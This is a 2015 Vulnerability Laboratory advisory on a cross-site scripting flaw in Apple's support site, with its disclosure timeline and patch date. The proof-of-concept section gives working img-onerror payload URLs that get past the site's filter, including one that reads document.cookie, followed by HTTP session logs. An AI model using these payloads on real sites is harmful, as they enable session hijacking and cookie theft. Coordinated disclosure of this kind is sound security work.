Document Title:
===============
Apple Support - Permission Exception Web Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1531

Apple ID: 624514370


Release Date:
=============
2015-08-13


Vulnerability Laboratory ID (VL-ID):
====================================
1531


Common Vulnerability Scoring System:
====================================
3.3


Product & Service Introduction:
===============================
Apple Inc. is an American multinational technology company headquartered in Cupertino, California, that designs, develops, and sells 
consumer electronics, computer software, online services, and personal computers. Its best-known hardware products are the Mac line 
of computers, the iPod media player, the iPhone smartphone, the iPad tablet computer, and the Apple Watch smartwatch. Its online 
services include iCloud, the iTunes Store, and the App Store. Apple`s consumer software includes the OS X and iOS operating systems, 
the iTunes media browser, the Safari web browser, and the iLife and iWork creativity and productivity suites.

(Copy of the Homepage: https://en.wikipedia.org/?title=Apple_Inc. )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered an client-side input validation web vulnerability in the official Apple support online-service web-application.


Vulnerability Disclosure Timeline:
==================================
2015-06-21:	Researcher Notification & Coordination (Benjamin Kunz Mejri)
2015-06-22:	Vendor Notification 1 (Apple Product Security Team)
2015-07-13:	Vendor Response/Feedback (Apple Product Security Team)
2015-08-06:	Vendor Fix/Patch (Apple Developer Team - Cupertino)
2015-08-13:	Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Apple
Product: Apple Support - Online Service (Web-Application) 2015 Q2


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Low


Technical Details & Description:
================================
A non-persistent input validation web vulnerability has been discovered in the official Apple support online-service web-application.
The security vulnerability allows remote attackers to manipulate client-side application to browser requests to compromise user or 
admin session information.

The vulnerability is located in the `specs` and `downloads` module of the apple support online-service website. Remote attackers are able to 
inject malicious script codes to client-side application requests. Remote attackers are able to prepare special crafted weblinks to execute 
client-side script code that compromises the apple user/admin session data. The execution of the script code occurs in the permission denied 
exception handling of the support website. The injection point of the issue is the specs and downloads module. The attack vector of the 
vulnerability is located on the client-side of the online-service and the request method to inject or execute the code is GET.

The online-service of the apple support site impact a basic validation that will become visible after the first payload of the poc is executed.
This filter parses the input of basic injected frames and script tags but img src and the new html5 tags bypass the mechanism to compromise. 

The security risk of the non-persistent cross site vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.3.
Exploitation of the non-persistent cross site scripting web vulnerability requires no privilege web application user account and low user interaction. 
Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing, non-persistent external redirects, non-persistent 
load of malicious script codes or non-persistent web module context manipulation.

Request Method(s):
				[+] GET

Vulnerable Service(s):
				[+] Apple Support (support.apple.com)

Vulnerable Module(s):
				[+] downloads
				[+] specs

Affected Module(s):
				[+] Exception Handling - Permission Denied


Proof of Concept (PoC):
=======================
The client-side vulnerability can be exploited by remote attackers without privilege application user account and with low or medium user interaction.
For security demonstration or to reproduce follow the provided information and steps below to continue.

PoC: Links
https://support.apple.com/downloads/#"><img src="c" onerror=alert('xss_by_samir')>
https://support.apple.com/en_US/specs/#%22%3E%3Cimg%20src=%22c%22%20onerror=alert%281%29%3E

PoC: Exception Handling
<HTML><HEAD>
<TITLE>Access Denied</TITLE>
</HEAD><BODY>
<H1>Access Denied</H1>
You don't have permission to access "http://support.apple.com/en_US/specs/%5C/%5C/%5C%22/%3E%3Cimg%20src=/%5C/%5C/%5C%22/c/%5C/%5C/%5C%22/%20onerror=alert(document.cookie)%3E" on this server.<P>
Reference #18.c3969d50.1434966414.5bc0f7a8
</BODY>
</HTML>


--- PoC Session Logs [GET] ---
11:59:24.548[0ms][total 948ms] Status: pending[] GET https://support.apple.com/en_US/specs/#%22%3E%3Cimg%20src=%22c%22%20onerror=alert%28document.cookie%29%3E 
Load Flags[VALIDATE_NEVER  LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Größe des Inhalts[unknown] Mime Type[unknown]
   Request Header:
      Host[support.apple.com]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Cookie[s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2AC1F1B685012A7D-40000135C007C9A9[CE]; xp_ci=3z2smrILzCKrz4fJzB4qz9VQCi7kQ; s_ppv=acs%253A%253Akb%253A%253Asp%253A%253Aspecs%2520%2528en_us%2529%2C100%2C100%2C875%2C; s_fid=25E9020A9657AFFB-1A13B4FBFC975380; s_orientation=%5B%5BB%5D%5D; s_pathLength=support%3D1%2C; s_invisit_n2_us=4; s_vnum_n2_us=4|1; POD=us~en; s_orientationHeight=875; searchTermState=search]
-
11:59:25.610[188ms][total 188ms] Status: 200[OK]
GET https://securemetrics.apple.com/b/ss/appleglobal,applesupport/1/H.25.5/s78337633175992?AQB=1&ndh=1&t=22%2F5%2F2015%2011%3A59%3A25%201%20-120&fid=25E9020A9657AFFB-1A13B4FBFC975380&pageName=acs%3A%3Akb%3A%3Adl%3A%3Aspecs%3A%3Asearch%20results%20%28us-en%29&g=https%3A%2F%2Fsupport.apple.com%2Fen_US%2Fspecs%2F%23%2522%253E%253Cimg%2520src%3D%2522c%2522%2520onerror%3Dalert%2528document.cookie%2529%253E&cc=USD&ch=www.lo.support&server=new%20approach%20legacy&events=event6&c1=search&v2=acs%3A%20%2F%5C%2F%5C%22%2F%2F%3E&c4=https%3A%2F%2Fsupport.apple.com%2Fen_us%2Fspecs%2F%23%2522%253e%253cimg%2520src%3D%2522c%2522%2520onerror%3Dalert%2528document.cookie%2529%253e&c5=win32&c6=D%3D%22%3A%20%22%2BpageName&c7=acs%3A%3Auser%3A%3Aspecs%20resource%3A%3A%2F%5C%2F%5C%22%2F%2F%3E&c9=windows&c14=acs%3A%3Akb%3A%3Asp%3A%3Aspecs%20%28en_us%29&c20=non-store%20kiosk&c25=direct%20entry&c49=D%3Ds_vi&v54=https%3A%2F%2Fsupport.apple.com%2Fen_us%2Fspecs%2F%23%2522%253e%253cimg%2520src%3D%2522c%2522%2520onerror%3Dalert%2528document.cookie%2529%253e&h1=www.lo.support&s=1920x1080&c=24&j=1.8.5&v=Y&k=Y&bw=1920&bh=875&p=Adobe%20Acrobat%3BJava%20Deployment%20Toolkit%207.0.600.19%3BJava%28TM%29%20Platform%20SE%207%20U60%3BMicrosoft%20Lync%20Web%20App%20Plug-in%3BNVIDIA%203D%20VISION%3BNVIDIA%203D%20Vision%3BQuickTime%20Plug-in%207.7.6%3BShockwave%20Flash%3BSilverlight%20Plug-In%3BiTunes%20Application%20Detector%3B&AQE=1 
Load Flags[VALIDATE_NEVER  ] Größe des Inhalts[43] Mime Type[image/gif]
   Request Header:
      Host[securemetrics.apple.com]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0]
      Accept[image/png,image/*;q=0.8,*/*;q=0.5]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[https://support.apple.com/en_US/specs//%5C/%5C/%5C%22///%3E%3Cimg%20src=/%5C/%5C/%5C%22///c/%5C/%5C/%5C%22///%20onerror=alert(document.cookie)%3E]
      Cookie[s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2AC1F1B685012A7D-40000135C007C9A9[CE]; xp_ci=3z2smrILzCKrz4fJzB4qz9VQCi7kQ; s_ppv=acs%253A%253Akb%253A%253Asp%253A%253Aspecs%2520%2528en_us%2529%2C100%2C100%2C875%2C; s_fid=25E9020A9657AFFB-1A13B4FBFC975380; s_orientation=%5B%5BB%5D%5D; s_pathLength=support%3D1%2C; s_invisit_n2_us=4; s_vnum_n2_us=4|1; POD=us~en; s_orientationHeight=875; searchTermState=search; accs=o]
      Connection[keep-alive]
   Response Header:
      Date[Mon, 22 Jun 2015 09:59:27 GMT]
      Server[Omniture DC/2.0.0]
      Access-Control-Allow-Origin[*]
      Set-Cookie[s_vi=[CS]v1|2AC1F1B685012A7D-40000135C007C9A9[CE]; Expires=Wed, 21 Jun 2017 09:59:27 GMT; Domain=.apple.com; Path=/]
      X-C[ms-4.9.6]
      Expires[Sun, 21 Jun 2015 09:59:27 GMT]
      Last-Modified[Tue, 23 Jun 2015 09:59:27 GMT]
      Cache-Control[no-cache, no-store, max-age=0, no-transform, private]
      Pragma[no-cache]
      Etag["5587DC7F-5AEE-3B5813C3"]
      Vary[*]
      p3p[policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"]
      xserver[www148]
      Content-Length[43]
      Keep-Alive[timeout=15]
      Connection[Keep-Alive]
      Content-Type[image/gif]


Reference(s):
https://support.apple.com
https://securemetrics.apple.com


Solution - Fix & Patch:
=======================
2015-08-06:	Vendor Fix/Patch (Apple Developer Team - Cupertino)


Security Risk:
==============
The security risk of the client-side cross site scripting web vulnerability in the exception handling is estimated as medium. (CVSS 3.3)


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Hadji Samir [samir@evolution-sec.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed 
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable 
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab 
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for 
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, 
policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       		- www.evolution-sec.com
Contact:    admin@vulnerability-lab.com 	- research@vulnerability-lab.com 	       		- admin@evolution-sec.com
Section:    magazine.vulnerability-db.com	- vulnerability-lab.com/contact.php		       	- evolution-sec.com/contact
Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       		- youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   		- vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php  	- vulnerability-lab.com/list-of-bug-bounty-programs.php	- vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to 
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website 
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact 
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

				Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™